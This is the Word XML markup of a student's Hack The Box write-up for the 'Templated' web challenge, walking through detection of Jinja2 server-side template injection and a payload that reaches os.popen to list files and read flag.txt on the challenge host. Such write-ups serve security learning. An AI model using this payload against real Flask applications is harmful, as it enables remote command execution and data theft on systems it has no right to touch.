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451F" w14:textId="537213F4" w:rsidR="001B3096" w:rsidRDefault="001B3096"/>
    <w:p w14:paraId="5A7460EA" w14:textId="46DC036B" w:rsidR="005F58EE" w:rsidRDefault="005F58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Hack The Box Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017BEA6E" w14:textId="3E64A897" w:rsidR="005F58EE" w:rsidRDefault="005F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Challenges : Templated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A48DDC" w14:textId="32B0CDA7" w:rsidR="005F58EE" w:rsidRDefault="005F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: Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CE3DA2" w14:textId="58F72511" w:rsidR="005F58EE" w:rsidRDefault="005F58EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C55D884" w14:textId="6B4EECF3" w:rsidR="005F58EE" w:rsidRDefault="005F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: </w:t>
      </w:r>
      <w:r w:rsidRPr="00546572">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1A2332"/>
        </w:rPr>
        <w:t>Can you exploit this simple mistake?</w:t>
      </w:r>
      <w:r w:rsidRPr="00546572">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="1A2332"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99EE9D" w14:textId="443B8891" w:rsidR="005F58EE" w:rsidRDefault="005F58EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927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when you start the box, it will give you the host IP and port </w:t>
      </w:r>
      <w:r w:rsidRPr="00546572"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  <w:t>157.245.35.236:31358</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF2FAF1" w14:textId="41919999" w:rsidR="005F58EE" w:rsidRDefault="00A9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thing I do was to open in the web browser because this is a web challenge, and we got this page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE50F6" w14:textId="6534A0B1" w:rsidR="00A94F54" w:rsidRDefault="00A94F54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A6CF2B7" w14:textId="6051EEFB" w:rsidR="00A94F54" w:rsidRDefault="001C2EFE" w:rsidP="00A9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A0CB8" wp14:editId="46E95922">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-133350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3222625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="62674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F2A2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53.75pt" to="483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94F54" w:rsidRPr="00A94F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18532" wp14:editId="0B186ACD">
            <wp:extent cx="5943600" cy="30924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965F" w14:textId="44337E69" w:rsidR="00A94F54" w:rsidRDefault="00A94F54" w:rsidP="00A94F54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DF08B6" w14:textId="005155CE" w:rsidR="005B02CF" w:rsidRDefault="00A94F54" w:rsidP="005B0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check up the inspect element and it was empty there is nothing or clue in there, all we got is the URL.</w:t>
      </w:r>
      <w:r w:rsidR="00BC3958">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notice the Flask/jinja2, </w:t>
      </w:r>
      <w:r w:rsidR="005B02CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jinja2 is a web template engine written up with pure python code that used in flask</w:t>
      </w:r>
      <w:r w:rsidR="005B02CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, that’s mean it may be we can perform SSTI (Server Site Template Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F89495" w14:textId="1E8F4D0D" w:rsidR="005B02CF" w:rsidRDefault="005B02CF" w:rsidP="005B02CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8B9E4C" w14:textId="318C4DF5" w:rsidR="005B02CF" w:rsidRPr="00A94F54" w:rsidRDefault="005B02CF" w:rsidP="005B0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a parameter in the URL to indicate possible SSTI by adding {{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06855266" w14:textId="5F69FA23" w:rsidR="00A94F54" w:rsidRPr="00546572" w:rsidRDefault="005B02CF" w:rsidP="00A94F54">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00546572"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  <w:t>157.245.35.236:31358</w:t>
      </w:r>
      <w:r w:rsidRPr="00546572"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  <w:t>/{{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FADF377" w14:textId="4F622BDE" w:rsidR="005B02CF" w:rsidRDefault="005B02CF" w:rsidP="00A94F54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0439C56F" w14:textId="684BEA38" w:rsidR="005B02CF" w:rsidRDefault="005B02CF" w:rsidP="00A94F54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436560D1" w14:textId="7CA8D5FB" w:rsidR="001C2EFE" w:rsidRDefault="001C2EFE" w:rsidP="00A94F54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C2EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7425E6A1" wp14:editId="6D0DB6C8">
            <wp:extent cx="5782482" cy="3458058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756E" w14:textId="45CD5B81" w:rsidR="005B02CF" w:rsidRDefault="005B02CF" w:rsidP="00A94F54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723C34EF" w14:textId="11323DEB" w:rsidR="00361546" w:rsidRDefault="00361546" w:rsidP="00A9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can see the result shown ‘49’, meaning it vulnerable to SSTI. There are many you can do with SSTI and one of them is MRO function to displa</w:t>
      </w:r>
      <w:r w:rsidR="0038477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classes</w:t>
      </w:r>
      <w:r w:rsidR="005F49F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. You need to make a payload and input it in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E09BB" w14:textId="31482EF7" w:rsidR="005F49F0" w:rsidRDefault="005F49F0" w:rsidP="00A94F54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393E8004" w14:textId="1595C39C" w:rsidR="005F49F0" w:rsidRDefault="005F49F0" w:rsidP="00A9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payload :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DF019" w14:textId="41B44BBF" w:rsidR="005F49F0" w:rsidRDefault="00546572" w:rsidP="00546572">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546572">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCAB0CF" w14:textId="46EDC78C" w:rsidR="00546572" w:rsidRDefault="00546572" w:rsidP="00546572">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0D113D" w14:textId="36082C84" w:rsidR="00546572" w:rsidRDefault="00546572" w:rsidP="00546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so it will look like this </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFA3D62" w14:textId="77777777" w:rsidR="00546572" w:rsidRDefault="00546572" w:rsidP="00546572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546572"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  <w:t>157.245.35.236:31358</w:t>
      </w:r>
      <w:r w:rsidRPr="00546572">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0054657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{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D2F476" w14:textId="2411912D" w:rsidR="00546572" w:rsidRPr="00546572" w:rsidRDefault="00546572" w:rsidP="00546572">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w14:paraId="4AB20400" w14:textId="1B46066F" w:rsidR="00FF7BCB" w:rsidRDefault="00FF7BCB" w:rsidP="00546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got this page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674271B4" w14:textId="7B10FF3F" w:rsidR="00FF7BCB" w:rsidRDefault="00FF7BCB" w:rsidP="00546572">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561D1390" w14:textId="5B7A1E0F" w:rsidR="00FF7BCB" w:rsidRDefault="00FF7BCB" w:rsidP="00546572">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF8440F" w14:textId="77777777" w:rsidR="00FF7BCB" w:rsidRDefault="00FF7BCB" w:rsidP="00546572">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BA68B2" w14:textId="25293BA9" w:rsidR="00FF7BCB" w:rsidRDefault="00FF7BCB" w:rsidP="00546572">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF7B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91E902" wp14:editId="6BA49D08">
            <wp:extent cx="5534797" cy="3905795"/>
            <wp:effectExtent l="0" t="0" r="889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5862A" wp14:editId="0A0ACD7E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-695326</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3909695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7229475" cy="476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94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2FF0C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07.85pt" to="514.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039D1809" w14:textId="479E0B02" w:rsidR="00FF7BCB" w:rsidRDefault="00FF7BCB" w:rsidP="00FF7BCB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15193574" w14:textId="1C00BBAF" w:rsidR="00FF7BCB" w:rsidRDefault="00074C0B" w:rsidP="00FF7BCB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found the flag.txt, now all we need to do just change ‘ls *’ in the popen to ‘cat flag.txt’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632CE4BD" w14:textId="7CBCF10B" w:rsidR="00074C0B" w:rsidRDefault="00074C0B" w:rsidP="00FF7BCB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become like this :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777827A8" w14:textId="303CBA1F" w:rsidR="00074C0B" w:rsidRDefault="00074C0B" w:rsidP="00FF7BCB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</w:p>
    <w:p w14:paraId="24BCFFB8" w14:textId="3634C27F" w:rsidR="00074C0B" w:rsidRDefault="00074C0B" w:rsidP="00FF7BCB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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D7B3B" w14:textId="2D910A16" w:rsidR="00074C0B" w:rsidRPr="00074C0B" w:rsidRDefault="00074C0B" w:rsidP="00074C0B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546572"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  <w:t>157.245.35.236:31358</w:t>
      </w:r>
      <w:r w:rsidRPr="00546572">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0054657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{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED0FA26" w14:textId="77777777" w:rsidR="00074C0B" w:rsidRDefault="00074C0B" w:rsidP="00074C0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A371CAA" w14:textId="211647E6" w:rsidR="00074C0B" w:rsidRDefault="00074C0B" w:rsidP="00074C0B">
      <w:pPr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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>After :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6284A1" w14:textId="3D402778" w:rsidR="00074C0B" w:rsidRDefault="00074C0B" w:rsidP="00074C0B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  <w:r w:rsidRPr="00546572"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  <w:t>157.245.35.236:31358</w:t>
      </w:r>
      <w:r w:rsidRPr="00546572">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0054657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{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("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cat flag.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="0054657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").read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3486F047" w14:textId="77777777" w:rsidR="00074C0B" w:rsidRPr="00546572" w:rsidRDefault="00074C0B" w:rsidP="00074C0B">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w14:paraId="3A14E358" w14:textId="46F9ED3A" w:rsidR="00074C0B" w:rsidRDefault="00074C0B" w:rsidP="00074C0B">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w14:paraId="7D0E9512" w14:textId="3379CCED" w:rsidR="003A15E8" w:rsidRDefault="003A15E8" w:rsidP="00074C0B">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w14:paraId="62B75D76" w14:textId="2F896F01" w:rsidR="003A15E8" w:rsidRDefault="003A15E8" w:rsidP="00074C0B">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w14:paraId="46744BDC" w14:textId="3FC8B194" w:rsidR="003A15E8" w:rsidRPr="00546572" w:rsidRDefault="003A15E8" w:rsidP="00074C0B">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="003A15E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111927"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="115142DA" wp14:editId="5663DA4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1685290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21242"/>
                <wp:lineTo x="21531" y="21242"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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73418" w14:textId="27F17DA3" w:rsidR="00074C0B" w:rsidRPr="00FF7BCB" w:rsidRDefault="003A15E8" w:rsidP="00FF7BCB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finally we got the flag</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00074C0B" w:rsidRPr="00FF7BC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CFFD" w14:textId="77777777" w:rsidR="00571E19" w:rsidRDefault="00571E19" w:rsidP="005F58EE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A179B3E" w14:textId="77777777" w:rsidR="00571E19" w:rsidRDefault="00571E19" w:rsidP="005F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115D" w14:textId="77777777" w:rsidR="00571E19" w:rsidRDefault="00571E19" w:rsidP="005F58EE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="716A3D82" w14:textId="77777777" w:rsidR="00571E19" w:rsidRDefault="00571E19" w:rsidP="005F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28C65" w14:textId="1B9CE5A1" w:rsidR="005F58EE" w:rsidRDefault="005F58E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Rionel Irawan </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="6D2204F6" w14:textId="1B241CD0" w:rsidR="005F58EE" w:rsidRPr="005F58EE" w:rsidRDefault="005F58E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LA07 / 2440009181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44"/>
    <w:rsid w:val="00074C0B"/>
    <w:rsid w:val="001B3096"/>
    <w:rsid w:val="001C2EFE"/>
    <w:rsid w:val="00361546"/>
    <w:rsid w:val="00384778"/>
    <w:rsid w:val="003A15E8"/>
    <w:rsid w:val="00546572"/>
    <w:rsid w:val="00571E19"/>
    <w:rsid w:val="005B02CF"/>
    <w:rsid w:val="005F49F0"/>
    <w:rsid w:val="005F58EE"/>
    <w:rsid w:val="00A94F54"/>
    <w:rsid w:val="00BC3958"/>
    <w:rsid w:val="00C33B44"/>
    <w:rsid w:val="00C40658"/>
    <w:rsid w:val="00C845A7"/>
    <w:rsid w:val="00E57C12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152B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C7E93CAA-6AD4-4F4C-821C-5F8BF2AE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EE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005F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RIONEL IRAWAN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>RIONEL IRAWAN</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-12T17:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-12T17:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>